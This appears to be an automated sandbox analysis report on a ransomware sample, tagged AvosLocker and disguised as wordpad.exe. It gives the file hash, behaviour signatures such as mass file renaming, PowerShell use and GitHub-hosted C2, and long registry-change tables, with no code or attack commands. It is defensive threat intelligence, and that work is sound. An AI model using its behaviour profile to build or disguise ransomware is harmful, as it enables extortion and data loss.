Malware Analysis Report

2024-10-16 03:26

Sample ID 240621-mlsxzswdpb
Target wordpad.exe
SHA256 09f10e7344ca61b53a080e4d54c7cb6ecd4e3308254b350906437e29e7a7d9b2
Tags
avoslocker execution ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

09f10e7344ca61b53a080e4d54c7cb6ecd4e3308254b350906437e29e7a7d9b2

Threat Level: Known bad

The file wordpad.exe was found to be: Known bad.

Malicious Activity Summary

avoslocker execution ransomware

Avoslocker Ransomware

Renames multiple (69) files with added filename extension

Nirsoft

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Process spawned suspicious child process

Drops file in System32 directory

Drops file in Program Files directory

Enumerates physical storage devices

Command and Scripting Interpreter: JavaScript

Unsigned PE

Opens file in notepad (likely ransom note)

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SendNotifyMessage

Modifies data under HKEY_USERS

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-21 10:33

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-21 10:33

Reported

2024-06-21 10:55

Platform

win10v2004-20240611-de

Max time kernel

1009s

Max time network

998s

Command Line

"C:\Users\Admin\AppData\Local\Temp\wordpad.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A

Renames multiple (69) files with added filename extension

ransomware

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A camo.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Process spawned suspicious child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE is not expected to spawn this process N/A C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog.etl C:\Windows\explorer.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\explorer.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState = 240000003428000000000000000000000000000001000000130000000000000062000000 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect = "0" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{23170F69-40C1-278A-1000-000100020000} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000064263917c9c3da01 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly = "0" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowStatusBar = "1" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{470C0EBD-5D73-4D58-9CED-E91E22E23282} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000fb2e3517c9c3da01 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{474C98EE-CF3D-41F5-80E3-4AAB0AB04301} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000000db13817c9c3da01 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "6" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden = "2" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn = "0" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133634399871534502" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{11DBB47C-A525-400B-9E80-A54615A090C0} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF = 010000000000000062853a17c9c3da01 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip = "1" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess = "0" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay = "1" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ExplorerStartupTraceRecorded = "1" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons = "0" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath = "0" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView = "1" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter = "0" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor = "1" C:\Windows\explorer.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\MRUListEx = 00000000ffffffff C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 020000000100000000000000ffffffff C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0 = 6800310000000000d558eb551000414456414e437e310000500009000400efbed558eb55d558eb552e0000009c2e02000000060000000000000000000000000000008f8b2c0161006400760061006e00630065006400720075006e002d00780036003400000018000000 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "4294967295" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0\NodeSlot = "10" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac04000000c8000000354b179bff40d211a27e00c04fc308710300000080000000354b179bff40d211a27e00c04fc308710200000080000000 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Generic" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\SniffedFolderType = "Generic" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 = 14002e8005398e082303024b98265d99428e115f0000 C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0\MRUListEx = ffffffff C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 000000000200000001000000ffffffff C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlgLegacy\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe N/A
